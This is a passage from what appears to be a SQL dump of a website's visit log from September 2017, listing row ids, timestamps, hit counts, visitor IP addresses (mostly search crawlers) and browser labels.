.132.86','other'),(161373,1506637859,1,1,0,0,'217.182.132.17','other'),(161374,1506637915,1,1,0,0,'217.182.132.7','other'),(161375,1506637931,1,1,0,0,'51.255.71.131','other'),(161376,1506638652,1,1,0,0,'164.132.162.188','other'),(161377,1506638729,1,1,0,0,'51.255.71.113','other'),(161378,1506639084,1,1,0,0,'217.182.132.22','other'),(161379,1506639157,1,1,0,0,'51.255.71.115','other'),(161380,1506639242,1,1,0,0,'164.132.162.159','other'),(161381,1506639247,1,1,0,0,'217.182.132.192','other'),(161382,1506639324,1,1,0,0,'66.249.64.29','chrome'),(161383,1506639816,1,1,0,0,'164.132.162.160','other'),(161384,1506639880,1,1,0,0,'151.80.27.118','other'),(161385,1506640204,1,1,0,0,'217.182.132.190','other'),(161386,1506640288,1,1,0,0,'51.255.65.12','other'),(161387,1506640537,1,1,0,0,'217.182.132.76','other'),(161388,1506640669,1,1,0,0,'51.255.65.44','other'),(161389,1506640674,1,1,0,0,'51.255.65.63','other'),(161390,1506640679,1,1,0,0,'217.182.132.52','other'),(161391,1506640728,1,1,0,0,'51.255.71.115','other'),(161392,1506641370,1,1,0,0,'5.45.207.9','other'),(161393,1506641767,1,1,0,0,'217.182.132.184','other'),(161394,1506641862,1,0,1,0,'66.249.64.29',''),(161395,1506641993,1,1,0,0,'217.182.132.154','other'),(161396,1506642088,1,1,0,0,'51.255.65.6','other'),(161397,1506642147,1,1,0,0,'137.74.207.161','other'),(161398,1506642453,1,1,0,0,'217.182.132.18','other'),(161399,1506642663,1,1,0,0,'217.182.132.17','other'),(161400,1506642914,1,0,1,0,'66.249.70.29',''),(161401,1506642975,1,0,1,0,'66.249.64.29',''),(161402,1506643497,1,1,0,0,'137.74.201.100','other'),(161403,1506643554,1,0,1,0,'66.249.64.30',''),(161404,1506643894,1,1,0,0,'51.255.65.14','other'),(161405,1506643903,1,0,1,0,'66.249.64.28',''),(161406,1506644279,1,0,1,0,'66.249.70.25',''),(161407,1506644281,1,1,0,0,'66.249.70.29','chrome'),(161408,1506644963,1,1,0,0,'216.244.66.237','other'),(161409,1506645009,1,1,0,0,'157.55.39.176','other'),(161410,1506645049,1,1,0,0,'51.255.65.21','other'),(161411,1506645061,1,1,0,0,'217.182.132.185','other'),(161412,1506645194,2,0,2,0,'66.249.64.30',''),(161413,1506645322,1,1,0,0,'217.182.132.70','other'),(161414,1506645405,1,1,0,0,'217.182.132.54','other'),(161415,1506645418,1,1,0,0,'137.74.207.114','other'),(161416,1506645644,1,1,0,0,'157.55.39.45','other'),(161417,1506645836,1,0,1,0,'66.249.70.29',''),(161418,1506645865,1,1,0,0,'46.161.9.55','chrome'),(161419,1506645912,1,1,0,0,'137.74.207.119','other'),(161420,1506645922,1,1,0,0,'217.182.132.20','other'),(161421,1506645929,1,0,1,0,'66.249.64.28',''),(161422,1506645987,1,1,0,0,'217.182.132.185','other'),(161423,1506646029,1,1,0,0,'51.255.71.120','other'),(161424,1506646309,1,1,0,0,'51.255.65.84','other'),(161425,1506646448,1,1,0,0,'91.209.11.236','other'),(161426,1506646718,1,1,0,0,'217.182.132.187','other'),(161427,1506646727,1,1,0,0,'66.249.64.28','chrome'),(161428,1506646790,1,1,0,0,'217.182.132.90','other'),(161429,1506647416,1,1,0,0,'137.74.207.108','other'),(161430,1506647484,1,1,0,0,'51.255.65.65','other'),(161431,1506647499,1,1,0,0,'157.55.39.176','other'),(161432,1506647560,1,1,0,0,'216.244.66.237','other'),(161433,1506647565,1,1,0,0,'51.255.71.132','other'),(161434,1506647578,1,0,1,0,'66.249.64.30',''),(161435,1506647750,1,0,1,0,'66.249.70.25',''),(161436,1506647844,1,1,0,0,'91.209.11.236','other'),(161437,1506647860,1,0,1,0,'66.249.64.29',''),(161438,1506648132,1,1,0,0,'8.29.198.26','other'),(161439,1506648213,1,1,0,0,'51.255.71.112','other'),(161440,1506648347,1,1,0,0,'137.74.207.114','other'),(161441,1506648498,1,1,0,0,'51.255.65.28','other'),(161442,1506648768,1,1,0,0,'217.182.132.91','other'),(161443,1506648869,1,1,0,0,'51.255.71.131','other'),(161444,1506648889,1,1,0,0,'66.249.70.29','chrome'),(161445,1506648990,1,1,0,0,'217.182.132.149','other'),(161446,1506649170,1,1,0,0,'51.255.65.93','other'),(161447,1506649177,1,1,0,0,'217.182.132.59','other'),(161448,1506649211,1,1,0,0,'217.182.132.82','other'),(161449,1506649251,1,1,0,0,'217.182.132.241','other'),(161450,1506649346,1,1,0,0,'217.182.132.152','other'),(161451,1506649391,1,1,0,0,'217.182.132.18','other'),(161452,1506649429,1,1,0,0,'51.255.65.59','other'),(161453,1506649438,1,1,0,0,'217.182.132.78','other'),(161454,1506649619,1,1,0,0,'217.182.132.31','other'),(161455,1506649710,1,1,0,0,'51.255.65.52','other'),(161456,1506649759,1,1,0,0,'164.132.162.188','other'),(161457,1506649789,2,2,0,0,'216.244.66.237','other'),(161458,1506650060,1,1,0,0,'137.74.207.188','other'),(161459,1506650192,1,1,0,0,'51.255.65.71','other'),(161460,1506650362,1,1,0,0,'137.74.201.100','other'),(161461,1506650573,1,0,1,0,'68.180.229.52',''),(161462,1506650997,1,1,0,0,'217.182.132.51','other'),(161463,1506651148,1,1,0,0,'217.182.132.65','other'),(161464,1506651196,1,1,0,0,'217.182.132.193','other'),(161465,1506651222,1,1,0,0,'51.255.65.90','other'),(161466,1506651362,1,1,0,0,'217.182.132.61','other'),(161467,1506651503,1,1,0,0,'51.255.65.32','other'),(161468,1506651523,1,0,1,0,'66.249.64.28',''),(161469,1506652065,1,1,0,0,'217.182.132.80','other'),(161470,1506652181,1,1,0,0,'51.255.65.17','other'),(161471,1506652294,1,1,0,0,'51.255.65.70','other'),(161472,1506652341,1,1,0,0,'217.182.132.190','other'),(161473,1506652395,1,1,0,0,'95.108.181.97','other'),(161474,1506652522,1,1,0,0,'66.249.70.29','chrome'),(161475,1506652669,1,1,0,0,'51.255.65.29','other'),(161476,1506652726,1,1,0,0,'217.182.132.17','other'),(161477,1506652761,1,0,1,0,'66.249.64.28',''),(161478,1506652853,1,1,0,0,'51.255.65.65','other'),(161479,1506652869,1,1,0,0,'216.244.66.237','other'),(161480,1506652960,1,0,1,0,'68.180.229.52',''),(161481,1506653122,1,1,0,0,'217.182.132.179','other'),(161482,1506653135,1,1,0,0,'217.182.132.97','other'),(161483,1506653163,1,1,0,0,'217.182.132.86','other'),(161484,1506653180,1,1,0,0,'51.255.65.7','other'),(161485,1506653232,1,1,0,0,'217.182.132.187','other'),(161486,1506653286,1,0,1,0,'66.249.64.29',''),(161487,1506653379,1,1,0,0,'217.182.132.180','other'),(161488,1506653626,1,1,0,0,'37.73.204.112','chrome'),(161489,1506653855,1,1,0,0,'164.132.164.180','other'),(161490,1506654252,1,1,0,0,'217.182.132.184','other'),(161491,1506654295,1,1,0,0,'107.167.108.9','other'),(161492,1506654438,1,1,0,0,'66.249.64.30','chrome'),(161493,1506654782,1,1,0,0,'217.182.132.36','other'),(161494,1506654804,1,1,0,0,'51.255.65.5','other'),(161495,1506654855,1,1,0,0,'217.182.132.152','other'),(161496,1506654902,3,3,0,0,'208.83.1.168','chrome'),(161497,1506654903,7,7,0,0,'208.83.1.168','other'),(161498,1506654905,2,2,0,0,'208.83.1.168','firefox'),(161499,1506655072,1,1,0,0,'217.182.132.34','other'),(161500,1506655161,1,1,0,0,'217.182.132.79','other'),(161501,1506655276,1,1,0,0,'51.255.71.100','other'),(161502,1506655277,1,1,0,0,'51.255.65.72','other'),(161503,1506655315,1,1,0,0,'217.182.132.57','other'),(161504,1506655491,1,1,0,0,'51.255.65.56','other'),(161505,1506655494,1,0,1,0,'66.249.70.25',''),(161506,1506655603,1,0,1,0,'66.249.64.28',''),(161507,1506655829,1,0,1,0,'66.249.64.30',''),(161508,1506656164,1,1,0,0,'217.182.132.177','other'),(161509,1506656172,1,1,0,0,'217.182.132.22','other'),(161510,1506656207,1,1,0,0,'5.45.207.74','other'),(161511,1506656264,1,1,0,0,'51.255.65.79','other'),(161512,1506656665,1,1,0,0,'157.55.39.176','other'),(161513,1506656803,1,1,0,0,'51.255.65.66','other'),(161514,1506656805,1,1,0,0,'51.255.65.59','other'),(161515,1506656886,1,1,0,0,'51.255.65.67','other'),(161516,1506657840,1,1,0,0,'217.182.132.57','other'),(161517,1506658241,1,1,0,0,'51.255.71.133','other'),(161518,1506658449,1,0,1,0,'66.249.64.30',''),(161519,1506658518,1,1,0,0,'46.161.9.55','firefox'),(161520,1506658571,1,1,0,0,'5.255.253.3','other'),(161521,1506658927,1,1,0,0,'137.74.207.164','other'),(161522,1506658956,1,1,0,0,'8.29.198.25','other'),(161523,1506659234,1,1,0,0,'66.249.70.29','chrome'),(161524,1506659370,1,1,0,0,'217.182.132.188','other'),(161525,1506659550,1,1,0,0,'51.255.65.64','other'),(161526,1506659570,1,1,0,0,'51.255.65.97','other'),(161527,1506659714,1,1,0,0,'51.255.71.119','other'),(161528,1506659913,1,1,0,0,'5.255.253.3','other'),(161529,1506659986,1,1,0,0,'137.74.201.100','other'),(161530,1506660005,1,1,0,0,'51.255.65.12','other'),(161531,1506660212,1,0,1,0,'66.249.64.28',''),(161532,1506660216,1,1,0,0,'217.182.132.97','other'),(161533,1506660291,1,1,0,0,'217.182.132.150','other'),(161534,1506660350,1,1,0,0,'107.167.107.147','opera'),(161535,1506660394,2,2,0,0,'83.24.79.88','msie'),(161536,1506660397,1,1,0,0,'217.182.132.23','other'),(161537,1506660428,1,1,0,0,'51.255.65.29','other'),(161538,1506660775,1,1,0,0,'151.80.27.116','other'),(161539,1506660928,1,1,0,0,'51.255.71.119','other'),(161540,1506660972,1,1,0,0,'95.108.181.97','other'),(161541,1506661094,1,1,0,0,'66.249.64.28','chrome'),(161542,1506661110,1,1,0,0,'217.182.132.33','other'),(161543,1506661256,1,1,0,0,'51.255.64.106','other'),(161544,1506661364,1,1,0,0,'51.255.71.112','other'),(161545,1506661520,1,1,0,0,'51.255.65.17','other'),(161546,1506662016,1,0,1,0,'66.249.70.27',''),(161547,1506662084,1,1,0,0,'51.255.65.16','other'),(161548,1506662439,1,0,1,0,'68.180.229.52',''),(161549,1506662468,1,1,0,0,'217.182.132.81','other'),(161550,1506662632,1,1,0,0,'51.255.65.10','other'),(161551,1506662693,1,1,0,0,'164.132.162.160','other'),(161552,1506662856,1,1,0,0,'51.255.65.34','other'),(161553,1506662905,1,1,0,0,'51.255.65.38','other'),(161554,1506663093,1,1,0,0,'51.15.52.84','opera'),(161555,1506663100,1,1,0,0,'209.90.225.210','chrome'),(161556,1506663103,1,1,0,0,'51.15.52.84','chrome'),(161557,1506663134,1,1,0,0,'217.182.132.85','other'),(161558,1506663194,1,1,0,0,'164.132.164.180','other'),(161559,1506663620,1,1,0,0,'51.15.52.84','msie'),(161560,1506663732,1,1,0,0,'217.182.132.24','other'),(161561,1506663935,1,1,0,0,'217.182.132.65','other'),(161562,1506664015,1,1,0,0,'51.15.52.84','chrome'),(161563,1506664096,1,1,0,0,'51.255.65.25','other'),(161564,1506664117,1,1,0,0,'217.182.132.87','other'),(161565,1506664124,1,1,0,0,'217.182.132.34','other'),(161566,1506664374,1,1,0,0,'51.15.52.84','firefox'),(161567,1506664460,1,1,0,0,'51.255.65.12','other'),(161568,1506664671,1,1,0,0,'51.15.52.84','other'),(161569,1506664702,1,1,0,0,'51.255.71.110','other'),(161570,1506664921,2,2,0,0,'51.15.52.84','chrome'),(161571,1506665023,4,0,4,0,'66.249.64.29',''),(161572,1506665036,1,1,0,0,'5.45.207.74','other'),(161573,1506665053,1,1,0,0,'217.182.132.33','other'),(161574,1506665092,1,1,0,0,'51.255.71.118','other'),(161575,1506665123,1,1,0,0,'51.255.65.52','other'),(161576,1506665124,1,0,1,0,'66.249.70.27',''),(161577,1506665508,1,1,0,0,'51.255.65.68','other'),(161578,1506665544,1,1,0,0,'66.249.70.25','chrome'),(161579,1506665578,1,1,0,0,'51.255.71.132','other'),(161580,1506665608,1,1,0,0,'51.15.52.84','msie'),(161581,1506665680,1,1,0,0,'137.74.207.164','other'),(161582,1506665826,1,1,0,0,'51.15.52.84','chrome'),(161583,1506665869,1,1,0,0,'51.255.65.97','other'),(161584,1506666086,1,1,0,0,'217.182.132.18','other'),(161585,1506666120,1,1,0,0,'217.182.132.154','other'),(161586,1506666182,1,1,0,0,'217.69.133.203','other'),(161587,1506666616,1,1,0,0,'91.196.178.66','firefox'),(161588,1506666686,1,1,0,0,'5.45.207.9','other'),(161589,1506666704,1,1,0,0,'157.55.39.45','other'),(161590,1506666739,1,1,0,0,'91.209.11.236','other'),(161591,1506666760,1,1,0,0,'217.182.132.56','other'),(161592,1506666787,1,1,0,0,'217.182.132.79','other'),(161593,1506666964,1,1,0,0,'217.182.132.85','other'),(161594,1506666969,1,1,0,0,'14.203.79.163','firefox'),(161595,1506667060,1,1,0,0,'217.182.132.154','other'),(161596,1506667077,2,1,1,0,'66.249.64.29',''),(161597,1506667097,1,1,0,0,'51.255.65.17','other'),(161598,1506667210,1,1,0,0,'164.132.162.164','other'),(161599,1506667249,1,1,0,0,'51.255.65.82','other'),(161600,1506667469,1,1,0,0,'51.255.65.5','other'),(161601,1506667661,1,1,0,0,'51.255.65.78','other'),(161602,1506667853,1,1,0,0,'51.255.65.66','other'),(161603,1506667926,1,1,0,0,'217.182.132.61','other'),(161604,1506668251,1,0,1,0,'66.249.64.30',''),(161605,1506668294,1,1,0,0,'217.182.132.53','other'),(161606,1506668299,1,1,0,0,'217.182.132.183','other'),(161607,1506668307,1,0,1,0,'66.249.64.29',''),(161608,1506668487,1,1,0,0,'180.76.15.16','other'),(161609,1506668522,8,8,0,0,'86.147.242.137','other'),(161610,1506668589,1,1,0,0,'217.182.132.146','other'),(161611,1506669054,1,1,0,0,'217.182.132.35','other'),(161612,1506669250,1,1,0,0,'164.132.162.160','other'),(161613,1506669343,1,1,0,0,'217.182.132.61','other'),(161614,1506669794,1,1,0,0,'8.29.198.25','other'),(161615,1506669866,1,1,0,0,'51.255.65.70','other'),(161616,1506670126,1,1,0,0,'137.74.207.164','other'),(161617,1506670226,1,1,0,0,'137.74.207.114','other'),(161618,1506670595,1,0,1,0,'66.249.64.28',''),(161619,1506670692,1,1,0,0,'51.255.65.94','other'),(161620,1506670756,1,1,0,0,'66.249.70.29','chrome'),(161621,1506670771,1,1,0,0,'51.255.65.224','other'),(161622,1506670970,1,1,0,0,'164.132.162.188','other'),(161623,1506671307,1,1,0,0,'217.182.132.186','other'),(161624,1506671320,1,0,1,0,'68.180.230.153',''),(161625,1506671340,1,0,1,0,'66.249.70.27',''),(161626,1506671409,1,0,1,0,'66.249.64.29',''),(161627,1506671469,1,1,0,0,'91.196.178.168','chrome'),(161628,1506671566,1,1,0,0,'51.255.65.60','other'),(161629,1506671635,1,1,0,0,'151.80.27.118','other'),(161630,1506671683,1,1,0,0,'217.182.132.181','other'),(161631,1506671753,1,1,0,0,'51.255.65.91','other'),(161632,1506671999,1,1,0,0,'91.209.11.236','other'),(161633,1506672104,1,1,0,0,'217.182.132.51','other'),(161634,1506672110,1,1,0,0,'217.182.132.83','other'),(161635,1506672589,1,1,0,0,'137.74.207.164','other'),(161636,1506672902,1,0,1,0,'66.249.70.29',''),(161637,1506672951,1,1,0,0,'5.45.207.64','other'),(161638,1506673026,1,1,0,0,'66.249.64.28','chrome'),(161639,1506673102,1,1,0,0,'40.77.167.64','other'),(161640,1506673136,1,1,0,0,'217.182.132.66','other'),(161641,1506673212,1,1,0,0,'137.74.201.108','other'),(161642,1506673573,1,1,0,0,'217.182.132.241','other'),(161643,1506673900,1,1,0,0,'51.255.65.80','other'),(161644,1506673968,2,2,0,0,'216.244.66.237','other'),(161645,1506674043,1,1,0,0,'51.255.65.14','other'),(161646,1506674198,1,0,1,0,'66.249.64.30',''),(161647,1506674308,1,1,0,0,'51.255.65.25','other'),(161648,1506674632,2,2,0,0,'91.196.178.72','chrome'),(161649,1506674646,1,1,0,0,'164.132.164.180','other'),(161650,1506674647,1,1,0,0,'217.182.132.24','other'),(161651,1506675006,1,1,0,0,'217.182.132.4','other'),(161652,1506675309,1,1,0,0,'164.132.162.154','other'),(161653,1506675511,1,1,0,0,'217.182.132.187','other'),(161654,1506675981,1,1,0,0,'66.249.70.25','chrome'),(161655,1506676135,1,1,0,0,'5.45.207.9','other'),(161656,1506676347,1,1,0,0,'217.182.132.23','other'),(161657,1506676353,1,1,0,0,'51.255.65.36','other'),(161658,1506676421,1,0,1,0,'68.180.230.153',''),(161659,1506676581,1,1,0,0,'217.182.132.55','other'),(161660,1506676659,1,1,0,0,'51.255.71.120','other'),(161661,1506676714,1,1,0,0,'217.182.132.24','other'),(161662,1506676927,1,1,0,0,'137.74.207.119','other'),(161663,1506676956,1,0,1,0,'66.249.64.30',''),(161664,1506676996,1,1,0,0,'51.255.65.31','other'),(161665,1506677092,1,1,0,0,'217.182.132.31','other'),(161666,1506677164,1,1,0,0,'91.209.11.236','other'),(161667,1506677231,1,1,0,0,'217.69.133.2','other'),(161668,1506677554,1,1,0,0,'51.255.71.100','other'),(161669,1506677901,1,1,0,0,'188.226.170.140','chrome'),(161670,1506677979,1,1,0,0,'51.255.65.25','other'),(161671,1506678037,1,1,0,0,'66.249.64.28','chrome'),(161672,1506678175,1,1,0,0,'51.255.65.14','other'),(161673,1506678194,1,1,0,0,'51.255.65.27','other'),(161674,1506678432,1,1,0,0,'51.255.71.116','other'),(161675,1506678526,1,1,0,0,'37.9.113.75','other'),(161676,1506678730,1,1,0,0,'217.182.132.76','other'),(161677,1506678871,1,0,1,0,'66.249.64.30',''),(161678,1506678875,1,1,0,0,'91.196.178.72','chrome'),(161679,1506679138,2,0,2,0,'66.249.64.28',''),(161680,1506679264,1,1,0,0,'51.255.65.3','other'),(161682,1506679331,1,1,0,0,'217.182.132.36','other'),(161683,1506679419,1,1,0,0,'51.255.65.80','other'),(161684,1506679884,1,1,0,0,'217.182.132.54','other'),(161685,1506679993,1,1,0,0,'217.182.132.82','other'),(161686,1506680001,1,1,0,0,'66.249.70.27','chrome'),(161687,1506680189,1,1,0,0,'51.255.65.46','other'),(161688,1506680391,1,0,1,0,'68.180.229.52',''),(161689,1506680620,1,1,0,0,'217.182.132.16','other'),(161690,1506680622,1,1,0,0,'217.182.132.70','other'),(161691,1506680629,1,1,0,0,'51.255.65.63','other'),(161692,1506680646,2,2,0,0,'217.182.132.66','other'),(161693,1506680713,1,1,0,0,'51.255.65.51','other'),(161694,1506680739,1,1,0,0,'8.29.198.26','other'),(161695,1506680874,1,1,0,0,'51.255.65.68','other'),(161696,1506680894,1,1,0,0,'194.126.182.72','chrome'),(161697,1506681176,1,1,0,0,'51.255.65.34','other'),(161698,1506681285,1,1,0,0,'51.255.65.12','other'),(161699,1506681353,1,1,0,0,'51.255.65.16','other'),(161700,1506681374,1,1,0,0,'51.255.65.21','other'),(161701,1506681982,2,2,0,0,'137.74.207.114','other'),(161702,1506682226,1,1,0,0,'5.45.207.64','other'),(161703,1506682430,1,0,1,0,'66.249.64.29',''),(161704,1506682602,1,1,0,0,'51.255.71.129','other'),(161705,1506682623,1,1,0,0,'51.255.65.63','other'),(161706,1506682701,1,0,1,0,'66.249.64.28',''),(161707,1506682990,1,1,0,0,'164.132.162.153','other'),(161708,1506683024,1,1,0,0,'51.255.65.38','other'),(161709,1506683090,1,1,0,0,'157.55.39.176','other'),(161710,1506683199,1,1,0,0,'217.182.132.4','other'),(161711,1506683211,1,1,0,0,'51.255.65.6','other'),(161712,1506683276,1,1,0,0,'217.182.132.25','other'),(161713,1506683453,1,1,0,0,'66.249.64.30','chrome'),(161714,1506683656,1,1,0,0,'217.182.132.67','other'),(161715,1506683732,1,1,0,0,'51.255.71.123','other'),(161716,1506683917,1,1,0,0,'52.91.200.47','other'),(161717,1506683956,1,1,0,0,'51.255.65.75','other'),(161718,1506684254,2,2,0,0,'213.133.111.165','other'),(161719,1506684414,1,1,0,0,'137.74.207.116','other'),(161720,1506684595,1,1,0,0,'217.182.132.71','other'),(161721,1506684817,1,1,0,0,'164.132.164.180','other'),(161722,1506684915,1,1,0,0,'66.249.70.29','chrome'),(161723,1506685076,1,1,0,0,'217.182.132.83','other'),(161724,1506685114,1,1,0,0,'51.255.71.130','other'),(161725,1506685557,1,0,1,0,'66.249.64.30',''),(161726,1506685622,1,1,0,0,'51.255.71.125','other'),(161727,1506685873,1,1,0,0,'40.77.167.64','other'),(161728,1506686264,1,1,0,0,'217.182.132.172','other'),(161729,1506686265,1,1,0,0,'51.255.65.10','other'),(161730,1506686294,1,1,0,0,'51.255.65.61','other'),(161731,1506686489,1,1,0,0,'91.196.178.169','chrome'),(161732,1506686699,1,1,0,0,'51.255.65.54','other'),(161733,1506686740,2,2,0,0,'217.182.132.96','other'),(161734,1506686794,1,1,0,0,'51.255.65.70','other'),(161735,1506686976,1,1,0,0,'51.255.71.122','other'),(161736,1506686997,1,1,0,0,'194.37.248.11','chrome'),(161737,1506687177,1,0,1,0,'66.249.64.29',''),(161738,1506687197,1,1,0,0,'51.255.65.64','other'),(161739,1506687201,1,1,0,0,'178.154.171.75','other'),(161740,1506687455,1,1,0,0,'157.55.39.45','other'),(161741,1506687795,1,1,0,0,'91.196.178.163','chrome'),(161742,1506687879,1,1,0,0,'217.182.132.23','other'),(161743,1506687977,1,1,0,0,'217.182.132.188','other'),(161744,1506688056,1,0,1,0,'66.249.70.29',''),(161745,1506688304,1,1,0,0,'217.182.132.93','other'),(161746,1506688726,1,1,0,0,'66.249.64.29','chrome'),(161747,1506688999,1,1,0,0,'217.182.132.58','other'),(161748,1506689012,1,1,0,0,'137.74.201.99','other'),(161749,1506689075,1,0,1,0,'66.249.64.30',''),(161750,1506689141,1,1,0,0,'66.249.70.25','chrome'),(161751,1506689512,1,1,0,0,'51.255.65.6','other'),(161752,1506689611,1,1,0,0,'137.74.207.114','other'),(161753,1506689976,1,1,0,0,'217.182.132.84','other'),(161754,1506690009,1,1,0,0,'217.182.132.155','other'),(161755,1506690133,1,1,0,0,'217.182.132.85','other'),(161756,1506690204,1,1,0,0,'46.188.107.65','msie'),(161757,1506690268,1,1,0,0,'207.46.13.92','other'),(161758,1506690386,1,1,0,0,'137.74.203.194','other'),(161759,1506690440,1,1,0,0,'217.182.132.178','other'),(161760,1506690535,1,1,0,0,'91.196.178.169','chrome'),(161761,1506690878,1,1,0,0,'66.249.70.29','chrome'),(161762,1506690884,1,1,0,0,'5.45.207.9','other'),(161763,1506690963,1,1,0,0,'91.209.11.236','other'),(161764,1506691109,1,1,0,0,'46.211.3.189','chrome'),(161765,1506691322,1,1,0,0,'51.255.65.38','other'),(161766,1506691364,1,0,1,0,'66.249.64.28',''),(161767,1506691374,1,1,0,0,'164.132.162.160','other'),(161768,1506691406,1,1,0,0,'217.182.132.185','other'),(161769,1506691478,2,2,0,0,'91.196.178.169','chrome'),(161770,1506691596,1,1,0,0,'8.29.198.27','other'),(161771,1506691701,1,1,0,0,'185.137.17.89','chrome'),(161772,1506691879,1,1,0,0,'51.255.65.5','other'),(161773,1506691891,1,1,0,0,'94.179.24.251','firefox'),(161774,1506691916,1,1,0,0,'185.137.18.150','chrome'),(161775,1506692306,1,1,0,0,'5.45.207.64','other'),(161776,1506692323,1,1,0,0,'217.182.132.67','other'),(161777,1506693555,1,1,0,0,'91.209.11.236','other'),(161778,1506693614,1,1,0,0,'51.255.65.50','other'),(161779,1506693697,1,1,0,0,'54.165.59.7','other'),(161780,1506693699,1,1,0,0,'51.255.65.23','other'),(161781,1506693711,1,1,0,0,'51.255.71.122','other'),(161782,1506693895,1,1,0,0,'217.182.132.84','other'),(161783,1506693954,1,1,0,0,'204.79.180.16','msie'),(161784,1506694025,1,0,1,0,'66.249.64.28',''),(161785,1506694069,1,1,0,0,'216.244.66.237','other'),(161786,1506694092,1,1,0,0,'51.255.65.77','other'),(161787,1506694294,1,1,0,0,'66.249.64.29','chrome'),(161788,1506694346,1,1,0,0,'51.255.71.100','other'),(161789,1506694380,1,1,0,0,'217.182.132.181','other'),(161790,1506694429,1,1,0,0,'51.255.65.41','other'),(161791,1506694529,1,1,0,0,'51.255.71.132','other'),(161792,1506694604,1,1,0,0,'5.45.207.64','other'),(161793,1506694645,1,1,0,0,'194.146.180.27','chrome'),(161794,1506694659,1,1,0,0,'137.74.207.101','other'),(161795,1506695035,1,1,0,0,'217.182.132.170','other'),(161796,1506695110,1,1,0,0,'137.74.201.100','other'),(161797,1506695439,1,1,0,0,'51.255.65.81','other'),(161798,1506695563,1,1,0,0,'164.132.162.158','other'),(161799,1506695716,1,1,0,0,'51.255.65.79','other'),(161800,1506695734,1,1,0,0,'92.112.125.0','chrome'),(161801,1506695780,1,1,0,0,'217.69.133.85','other'),(161802,1506696082,1,1,0,0,'51.255.65.69','other'),(161803,1506696140,1,1,0,0,'66.249.70.27','chrome'),(161804,1506696188,1,1,0,0,'51.255.65.20','other'),(161805,1506696389,1,1,0,0,'5.45.207.64','other'),(161806,1506696481,1,1,0,0,'37.73.219.69','chrome'),(161807,1506696832,1,1,0,0,'51.255.65.83','other'),(161808,1506696868,1,1,0,0,'51.255.64.106','other'),(161809,1506696916,1,1,0,0,'164.132.162.153','other'),(161810,1506697020,1,1,0,0,'217.182.132.187','other'),(161811,1506697028,1,1,0,0,'51.255.65.56','other'),(161812,1506697254,1,1,0,0,'217.182.132.25','other'),(161813,1506697436,1,0,1,0,'66.249.64.30',''),(161814,1506697658,1,1,0,0,'217.182.132.4','other'),(161815,1506697779,1,0,1,0,'68.180.229.52',''),(161816,1506697919,1,1,0,0,'137.74.207.101','other'),(161817,1506697920,1,1,0,0,'51.255.65.26','other'),(161818,1506697922,1,1,0,0,'51.255.71.128','other'),(161819,1506697995,1,1,0,0,'217.182.132.152','other'),(161820,1506698063,1,1,0,0,'51.255.65.51','other'),(161821,1506698151,1,0,1,0,'66.249.70.25',''),(161822,1506698219,1,1,0,0,'217.182.132.170','other'),(161823,1506698245,1,1,0,0,'91.209.11.236','other'),(161824,1506698385,1,1,0,0,'51.255.65.20','other'),(161825,1506698533,1,1,0,0,'217.182.132.58','other'),(161826,1506698849,1,0,1,0,'68.180.230.153',''),(161827,1506699183,1,1,0,0,'51.255.65.8','other'),(161828,1506699245,1,1,0,0,'51.255.65.56','other'),(161829,1506699475,1,1,0,0,'51.255.65.51','other'),(161830,1506699497,1,1,0,0,'51.255.65.57','other'),(161831,1506699546,1,1,0,0,'66.249.64.29','chrome'),(161832,1506699618,1,1,0,0,'51.255.65.71','other'),(161833,1506699837,1,1,0,0,'51.255.64.106','other'),(161834,1506700377,1,1,0,0,'51.255.65.28','other'),(161835,1506700494,1,1,0,0,'51.255.65.2','other'),(161836,1506700756,1,1,0,0,'217.182.132.190','other'),(161837,1506700830,1,0,1,0,'66.249.70.27',''),(161838,1506700903,1,1,0,0,'217.182.132.240','other'),(161839,1506701002,1,1,0,0,'217.182.132.82','other'),(161840,1506701188,2,0,2,0,'68.180.229.52',''),(161841,1506701359,1,1,0,0,'217.182.132.55','other'),(161842,1506701434,2,2,0,0,'217.182.132.149','other'),(161843,1506701442,1,1,0,0,'66.249.70.29','chrome'),(161844,1506701753,1,1,0,0,'51.255.71.114','other'),(161845,1506701808,1,1,0,0,'51.255.65.69','other'),(161846,1506701957,1,1,0,0,'217.69.133.9','other'),(161847,1506702001,1,1,0,0,'217.182.132.150','other'),(161848,1506702210,1,0,1,0,'66.249.64.28',''),(161849,1506702395,1,1,0,0,'51.255.65.3','other'),(161850,1506702439,1,1,0,0,'8.29.198.26','other'),(161851,1506702498,1,1,0,0,'66.102.9.27','chrome'),(161852,1506702650,1,1,0,0,'51.255.71.127','other'),(161853,1506702754,1,1,0,0,'217.182.132.20','other'),(161854,1506703128,1,1,0,0,'51.255.65.26','other'),(161855,1506703350,1,1,0,0,'217.182.132.97','other'),(161856,1506703709,1,0,1,0,'66.249.64.30',''),(161857,1506703908,1,1,0,0,'217.182.132.21','other'),(161858,1506704076,1,1,0,0,'217.182.132.27','other'),(161859,1506704085,1,1,0,0,'51.255.71.110','other'),(161860,1506704130,1,0,1,0,'66.249.64.29',''),(161861,1506704239,1,1,0,0,'217.182.132.73','other'),(161862,1506704484,1,0,1,0,'68.180.229.52',''),(161863,1506704952,1,1,0,0,'51.255.65.78','other'),(161864,1506704962,2,1,1,0,'66.249.64.28',''),(161865,1506705393,1,1,0,0,'217.182.132.175','other'),(161866,1506705731,1,1,0,0,'141.8.183.5','other'),(161867,1506705770,1,1,0,0,'51.255.65.42','other'),(161868,1506705944,1,1,0,0,'217.182.132.69','other'),(161869,1506706160,2,2,0,0,'217.182.132.67','other'),(161870,1506706314,1,1,0,0,'51.255.65.90','other'),(161871,1506706502,1,0,1,0,'68.180.229.52',''),(161872,1506706507,2,0,2,0,'66.249.70.25',''),(161873,1506706591,1,1,0,0,'66.249.70.27','chrome'),(161874,1506706690,1,1,0,0,'217.182.132.50','other'),(161875,1506706909,2,2,0,0,'51.255.71.126','other'),(161876,1506706912,1,1,0,0,'164.132.162.160','other'),(161877,1506707223,1,1,0,0,'217.182.132.152','other'),(161878,1506707431,1,1,0,0,'217.182.132.74','other'),(161879,1506707561,1,1,0,0,'51.255.71.129','other'),(161880,1506707866,1,1,0,0,'51.255.71.131','other'),(161881,1506707960,1,1,0,0,'137.74.207.170','other'),(161882,1506708218,1,0,1,0,'66.249.64.28',''),(161883,1506708424,1,1,0,0,'217.182.132.175','other'),(161884,1506708466,1,1,0,0,'217.182.132.70','other'),(161885,1506708514,1,1,0,0,'51.255.65.12','other'),(161886,1506708747,1,1,0,0,'51.255.65.35','other'),(161887,1506708786,1,1,0,0,'217.182.132.90','other'),(161888,1506709442,1,1,0,0,'178.137.82.201','firefox'),